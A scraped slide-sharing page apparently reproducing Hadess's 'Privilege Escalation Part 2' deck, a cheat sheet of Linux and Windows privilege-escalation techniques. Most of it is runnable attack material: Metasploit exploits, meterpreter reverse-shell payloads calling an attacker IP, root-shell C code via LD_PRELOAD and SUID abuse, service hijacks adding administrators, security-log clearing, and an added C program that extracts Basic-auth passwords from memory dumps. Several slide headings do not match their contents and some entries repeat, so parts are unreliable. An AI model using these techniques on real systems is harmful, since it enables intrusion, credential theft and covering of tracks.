System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdfNunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
 
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
 
Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
 

74 Methods for Privilege Escalation Part 2

  • 6. CVE-2016-1531
    Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
        CVE-2016-1531.sh; id
  • 7. POLKIT
    Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
        https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
        poc.sh
  • 8. DIRTYPIPE
    Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
        ./traitor-amd64 --exploit kernel:CVE-2022-0847
        whoami; id
  • 9. PWNKIT
    Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
        ./cve-2021-4034
        whoami; id
  • 10. MS14_058
    Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
        msf > use exploit/windows/local/ms14_058_track_popup_menu
        msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
        msf exploit(ms14_058_track_popup_menu) > exploit
  • 11. HOT POTATO
    Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
        1. In command prompt type: powershell.exe -nop -ep bypass
        2. In PowerShell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
        3. In PowerShell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
        4. To confirm that the attack was successful, in PowerShell prompt type: net localgroup administrators
  • 12. INTEL SYSRET
    Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
        execute -H -f sysret.exe -a "-pid [pid]"
  • 13. PRINTNIGHTMARE
    Domain: Yes | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
        https://github.com/outflanknl/PrintNightmare
        PrintNightmare 10.10.10.10 exp.dll
  • 14. FOLLINA
    Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
        https://github.com/JohnHammond/msdt-follina
        python3 follina.py -c "notepad"
  • 15. ALPC
    Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
        https://github.com/riparino/Task_Scheduler_ALPC
  • 16. REMOTEPOTATO0
    Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
        sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
        .\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
  • 17. CVE-2022-26923
    Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
        certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
        Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
  • 18. MS14-068
    Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
        python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
  • 19. PASSWORD MINING IN MEMORY (LINUX)
    Domain: No | Local Admin: Yes | OS: Linux | Type: Enumeration & Hunt
        ps -ef | grep ftp; gdb -p ftp_id
        (gdb) info proc mappings
        (gdb) q
        (gdb) dump memory /tmp/mem [start] [end]
        (gdb) q
        strings /tmp/mem | grep passw
  • 20. PASSWORD MINING IN MEMORY (WINDOWS)
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        1. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
        2. In Metasploit (msf > prompt) type: set uripath x
        3. In Metasploit (msf > prompt) type: run
        4. In taskmgr, right-click on "iexplore.exe" in the "Image Name" column and select "Create Dump File" from the popup menu.
        5. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
        6. Copy the Base64 encoded string.
        7. In command prompt type: echo -ne [Base64 String] | base64 -d
  • 21. PASSWORD MINING IN REGISTRY
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        1. Open command prompt and type: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername
        2. In command prompt type: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
        3. Notice the credentials from the output.
        4. In command prompt type: reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyUsername
        5. In command prompt type: reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyPassword
        6. Notice the credentials from the output.
        7. In command prompt type: reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
        8. In command prompt type: reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
        9. Make note of the encrypted passwords and type: C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]
        10. From the output, make note of the credentials.
  • 22. PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        ./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
        flog -s 10s -n 200
        Or
        invoke-module LogCleaner.ps1
  • 23. PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        ./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
        flog -s 10s -n 200
        Or
        wevtutil cl Security
  • 24. STARTUP APPLICATIONS
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        1. In Metasploit (msf > prompt) type:
           use multi/handler
           set payload windows/meterpreter/reverse_tcp
           set lhost [Kali VM IP Address]
           run
        2. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
           Place x.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".
  • 25. PASSWORD MINING IN MCAFEESITELISTFILES
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        SharpUp.exe McAfeeSitelistFiles
  • 26. PASSWORD MINING IN CACHEDGPPPASSWORD
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        SharpUp.exe CachedGPPPassword
  • 27. PASSWORD MINING IN DOMAINGPPPASSWORD
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        SharpUp.exe DomainGPPPassword
  • 28. PASSWORD MINING IN KEEPASS
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        Seatbelt.exe keepass
        Or
        KeeTheft.exe
  • 29. PASSWORD MINING IN WINDOWSVAULT
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        Seatbelt.exe WindowsVault
  • 30. PASSWORD MINING IN SECPACKAGECREDS
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        Seatbelt.exe SecPackageCreds
  • 31. PASSWORD MINING IN PUTTYHOSTKEYS
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        Seatbelt.exe PuttyHostKeys
  • 32. PASSWORD MINING IN RDCMANFILES
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        Seatbelt.exe RDCManFiles
  • 33. PASSWORD MINING IN RDPSAVEDCONNECTIONS
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        Seatbelt.exe RDPSavedConnections
  • 34. PASSWORD MINING IN MASTERKEYS
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        SharpDPAPI masterkeys
  • 35. PASSWORD MINING IN BROWSERS
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        SharpWeb.exe all
  • 36. PASSWORD MINING IN FILES
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        SauronEye.exe -d C:\Users\vincent\Desktop --filetypes .txt .doc .docx .xls --contents --keywords password pass* -v
  • 37. PASSWORD MINING IN LDAP
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))" "samaccountname"
        Or
        Import-Module .\PowerView.ps1
        Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
  • 38. PASSWORD MINING IN CLIPBOARD
    Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
        execute-assembly /root/SharpClipHistory.exe
  • 39. PASSWORD MINING IN GMSA PASSWORD
    Domain: No | Local Admin: Yes | OS: Windows | Type: Delegate tokens
        GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
  • 40. DELEGATE TOKENS VIA RDP
    Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Delegate tokens
        ./fake_rdp.py
        Or
        pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem
  • 41. DELEGATE TOKENS VIA FTP
    Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Delegate tokens
        FakeFtpServer fakeFtpServer = new FakeFtpServer();
        fakeFtpServer.addUserAccount(new UserAccount("user", "password", "c:\\data"));
        FileSystem fileSystem = new WindowsFakeFileSystem();
        fileSystem.add(new DirectoryEntry("c:\\data"));
        fileSystem.add(new FileEntry("c:\\data\\file1.txt", "abcdef 1234567890"));
        fileSystem.add(new FileEntry("c:\\data\\run.exe"));
        fakeFtpServer.setFileSystem(fileSystem);
        fakeFtpServer.start();
  • 42. FAKE LOGON SCREEN
    Domain: No | Local Admin: Yes | OS: Windows | Type: Phish
        execute-assembly fakelogonscreen.exe
  • 43. ABUSING WINRM SERVICES
    Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Service
        RogueWinRM.exe -p C:\windows\system32\cmd.exe
  • 44. CERTIFICATE ABUSE
    Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Certificate
        Certify.exe request /ca:dc.domain.local\DC-CA /template:User…
        Rubeus.exe asktgt /user:CORP\itadmin /certificate:C:\cert.pfx /password:password
  • 45. SUDO LD_PRELOAD
    Domain: No | Local Admin: Yes | OS: Linux | Type: Injection
        1. ldreload.c:
           #include <stdio.h>
           #include <sys/types.h>
           #include <stdlib.h>
           #include <unistd.h>
           void _init() {
               unsetenv("LD_PRELOAD");
               setgid(0);
               setuid(0);
               system("/bin/bash");
           }
        2. gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
        3. sudo LD_PRELOAD=/tmp/ldreload.so apache2
        4. id
  • 46. ABUSING FILE PERMISSION VIA SUID BINARIES (.SO INJECTION)
    Domain: No | Local Admin: Yes | OS: Linux | Type: Injection
        1. mkdir /home/user/.config
        2. /home/user/.config/libcalc.c:
           #include <stdio.h>
           #include <stdlib.h>
           static void inject() __attribute__((constructor));
           void inject() {
               system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
           }
        3. gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
        4. /usr/local/bin/suid-so
        5. id
  • 47. DLL INJECTION
    Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Injection
        1. RemoteDLLInjector64
           Or MemJect
           Or https://github.com/tomcarver16/BOF-DLL-Inject
        2. #define PROCESS_NAME "csgo.exe"
           Or RemoteDLLInjector64.exe pid C:\runforpriv.dll
           Or mandllinjection ./runforpriv.dll pid
  • 48. EARLY BIRD INJECTION
    Domain: No | Local Admin: Yes | OS: Windows | Type: Injection
        hollow svchost.exe pop.bin
  • 49. PROCESS INJECTION THROUGH MEMORY SECTION
    Domain: No | Local Admin: Yes | OS: Windows | Type: Injection
        sec-shinject PID /path/to/bin
  • 50. ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE
    Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Scheduled Tasks
        echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh; chmod +x systemupdate.sh
        Wait a while
        /tmp/bash -p
        id && whoami
  • 51. ABUSING SCHEDULED TASKS VIA CRON WILDCARDS
    Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Scheduled Tasks
        echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh; touch "/home/user/--checkpoint=1"; touch "/home/user/--checkpoint-action=exec=sh systemupdate.sh"
        Wait a while
        /tmp/bash -p
        id && whoami
  • 52. ABUSING FILE PERMISSION VIA SUID BINARIES (SYMLINK)
    Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing File Permission
        1. su - www-data; nginxed-root.sh /var/log/nginx/error.log;
        2. As the root user: invoke-rc.d nginx rotate >/dev/null 2>&1
  • 54. ABUSING FILE PERMISSION VIA SUID BINARIES (ENVIRONMENT VARIABLES #1)
    Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing File Permission
        1. echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c;
        2. gcc /tmp/service.c -o /tmp/service;
        3. export PATH=/tmp:$PATH;
        4. /usr/local/bin/suid-env; id
  • 55. ABUSING FILE PERMISSION VIA SUID BINARIES (ENVIRONMENT VARIABLES #2)
    Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing File Permission
        env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p
  • 56. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege Windows_dll.c: cmd.exe /k net localgroup administrators user /add x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll sc stop dllsvc & sc start dllsvc 1. 2. 3. DLL HIJACKING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 57. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege sc config daclsvc binpath= "net localgroup administrators user /add" sc start daclsvc 1. 2. ABUSING SERVICES VIA BINPATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 58. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe Place common.exe in ‘C:Program FilesUnquoted Path Service’. sc start unquotedsvc 1. 2. 3. ABUSING SERVICES VIA UNQUOTED PATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 59. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege reg add HKLMSYSTEMCurrentControlSetservicesregsvc /v ImagePath /t REG_EXPAND_SZ /d c:tempx.exe /f sc start regsvc 1. 2. ABUSING SERVICES VIA REGISTRY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 60. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege copy /y c:Tempx.exe "c:Program FilesFile Permissions Servicefilepermservice.exe" sc start filepermsvc 1. 2. ABUSING SERVICES VIA EXECUTABLE FILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
• 61. ABUSING SERVICES VIA AUTORUN
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
An autorun entry whose program directory is writable runs the planted binary at the next logon of a privileged user.
1. In Metasploit (msf > prompt):
   use multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost [Kali VM IP Address]
   run
2. In a second terminal:
   msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
3. Place program.exe in "C:\Program Files\Autorun Program".
• 62. ABUSING SERVICES VIA ALWAYSINSTALLELEVATED
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
Applies only when AlwaysInstallElevated is set to 1 under both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer; any MSI a user launches then installs as SYSTEM.
1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
2. msiexec /quiet /qn /i C:\Temp\setup.msi
Or: SharpUp.exe AlwaysInstallElevated (checks whether the setting is present)
• 63. ABUSING SERVICES VIA SECREATETOKEN
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
Using the PrivEditor WinDbg extension (part of PrivFu) to edit token privileges:
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
2. !rmpriv
• 64. ABUSING SERVICES VIA SEDEBUG
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. Conjure-LSASS
Or: syscall_enable_priv 20 (20 is the LUID of SeDebugPrivilege)
• 65. REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE)
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
injectEtwBypass pid
• 66. ESCALATE WITH DUPLICATETOKENEX
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. PrimaryTokenTheft.exe pid
Or
2. TokenPlayer.exe --impersonate --pid pid
• 67. ABUSING SERVICES VIA SEINCREASEBASEPRIORITY
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
SeIncreaseBasePriorityPrivilege allows the REALTIME priority class, which starves every other thread on the box (a denial of service rather than a direct elevation):
start /realtime SomeCpuIntensiveApp.exe
• 68. ABUSING SERVICES VIA SEMANAGEVOLUME
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
Compile and run SeManageVolumeAbuse.
• 69. ABUSING SERVICES VIA SERELABEL
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. SeRelabelPrivilege grants WRITE_OWNER access to a resource, including files and folders, regardless of its DACL.
2. Run the resource taken over this way for privilege escalation.
• 70. ABUSING SERVICES VIA SERESTORE
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
SeRestorePrivilege bypasses file DACLs for writes, so binaries under %windir%\System32 can be swapped:
1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with Enable-SeRestorePrivilege.
3. Rename utilman.exe to utilman.old.
4. Rename cmd.exe to utilman.exe.
5. Lock the console and press Win+U; the lock screen launches utilman.exe (now cmd.exe) as SYSTEM.
• 71. ABUSE VIA SEBACKUP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
Recovering HTTP Basic credentials from a process memory dump:
1. In Metasploit (msf > prompt):
   use auxiliary/server/capture/http_basic
   set uripath x
   run
2. In Task Manager, right-click "iexplore.exe" in the "Image Name" column and select "Create Dump File".
3. On the attacker host: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
   Copy the Base64-encoded string and decode it: echo -ne [Base64 String] | base64 -d
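The strings | grep | base64 -d pipeline in step 3 only sees printable runs. The C program below is an added example, not code from the deck: it does the same recovery in one pass over raw dump bytes, finding every `Authorization: Basic` header, decoding the token and keeping only results shaped like user:password. The dump contents are constructed, including a torn copy of the header with no token to show that it is skipped rather than mis-decoded.

```c
/* basic_auth_scan.c: pull HTTP Basic credentials out of a raw memory dump.
 * Added example; DEMO_DUMP is constructed.
 * Build: gcc -Wall -o basic_auth_scan basic_auth_scan.c */
#include <stdio.h>
#include <string.h>

#define MAX_CRED 128

static int b64val(unsigned char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode src[0..len) (padding tolerated); returns decoded length or -1. */
int base64_decode(const char *src, size_t len, unsigned char *out, size_t outsz) {
    unsigned int acc = 0;
    int bits = 0;
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (src[i] == '=') break;
        int v = b64val((unsigned char)src[i]);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned int)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= outsz) return -1;
            out[n++] = (unsigned char)((acc >> bits) & 0xff);
        }
    }
    return (int)n;
}

/* Scan a byte buffer (NULs and all) for "Authorization: Basic <token>",
 * decode each token and keep those that contain ':' (user:password shape).
 * The marker match is case-sensitive, which is what browsers emit. */
int extract_basic_auth(const unsigned char *buf, size_t len, char creds[][MAX_CRED], int max) {
    static const char marker[] = "Authorization: Basic ";
    const size_t mlen = sizeof marker - 1;
    int found = 0;
    for (size_t i = 0; i + mlen <= len && found < max; i++) {
        if (memcmp(buf + i, marker, mlen) != 0) continue;
        size_t s = i + mlen, e = s;
        while (e < len && (b64val(buf[e]) >= 0 || buf[e] == '=')) e++;
        unsigned char dec[MAX_CRED];
        int n = base64_decode((const char *)buf + s, e - s, dec, sizeof dec - 1);
        if (n > 0 && memchr(dec, ':', (size_t)n)) {
            memcpy(creds[found], dec, (size_t)n);
            creds[found][n] = '\0';
            found++;
        }
        i = e;   /* resume after the token */
    }
    return found;
}

/* Constructed dump fragment: header residue, two captured requests, and a
 * torn header with no token in between. */
static const unsigned char DEMO_DUMP[] =
    "\x00\x00" "MZ\x90\x00\x03\x00\x00\x00"
    "GET /admin HTTP/1.1\r\nHost: 10.10.10.5\r\n"
    "Authorization: Basic dXNlcjpwYXNzd29yZA==\r\n"      /* user:password */
    "\x00\x7f\x00" "Authorization: Basic " "\x00\x00"    /* torn copy, skipped */
    "POST /api HTTP/1.1\r\n"
    "Authorization: Basic YWRtaW46czNjcmV0\r\n"          /* admin:s3cret */
    "\x00\x00";

static char demo_creds[8][MAX_CRED];
int demo_scan(void) { return extract_basic_auth(DEMO_DUMP, sizeof DEMO_DUMP - 1, demo_creds, 8); }
const char *demo_cred(int i) { demo_scan(); return demo_creds[i]; }

int main(void) {
    int n = demo_scan();
    printf("%d credential(s) recovered\n", n);
    for (int i = 0; i < n; i++) printf("  %s\n", demo_cred(i));
    return 0;
}
```

On a real .DMP replace DEMO_DUMP with the file contents read into memory; the scan is linear and does not depend on the header being surrounded by printable bytes.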
• 72. ABUSING VIA SECREATEPAGEFILE
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
Decompress the hibernation file so its memory contents can be examined offline (/MAJOR 6 /MINOR 1 is Windows 7 / Server 2008 R2; adjust for the target build):
HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin
• 73. ABUSING VIA SESYSTEMENVIRONMENT
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
2. TrustExec.exe -m exec -c "whoami /priv" -f
• 74. ABUSING VIA SETAKEOWNERSHIP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
SeTakeOwnershipPrivilege lets the user take ownership of any object; ownership then allows rewriting the DACL:
1. takeown.exe /f "%windir%\system32"
2. icacls.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
• 75. ABUSING VIA SETCB
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. PSBits or PrivFu (SeTcbPrivilege proofs of concept)
Or
2. psexec.exe -i -s -d cmd.exe
• 76. ABUSING VIA SETRUSTEDCREDMANACCESS
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
2. CredManBOF
Or: TrustExec.exe -m exec -c "whoami /priv" -f
• 77. ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
JuicyPotato.exe
Or, on builds where JuicyPotato no longer works (Windows 10 1809+ / Server 2019 and later):
https://github.com/decoder-it/juicy_2
https://github.com/antonioCoco/RoguePotato
• 78. ABUSING VIA SECREATEPAGEFILE
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. ./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
2. flog -s 10s -n 200
Or: invoke-module LogCleaner.ps1
• 79. About Hadess
Savior of your business to combat cyber threats.
Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.
Contact Us: To request additional information about Hadess's services, please fill out the form below. A Hadess representative will contact you shortly.
Email: Marketing@hadess.io
Phone No.: +989362181112
Company No.: +982128427515, +982177873383
Website: www.hadess.io (hadess_security)
• 80. Hadess Products and Services
Penetration Testing | PROTECTION PRO: Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.
Red Teaming Operation | PROTECTION PRO: Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.
RASP | Protect Applications and APIs Anywhere: Identifying and helping to address hidden weaknesses in your organization's security.
SAST | Audit Your Products: Identifying and helping to address hidden weaknesses in your applications.
PWN Z1 | Audit Your PPP: Identifying and helping to address hidden weaknesses in your organization's security.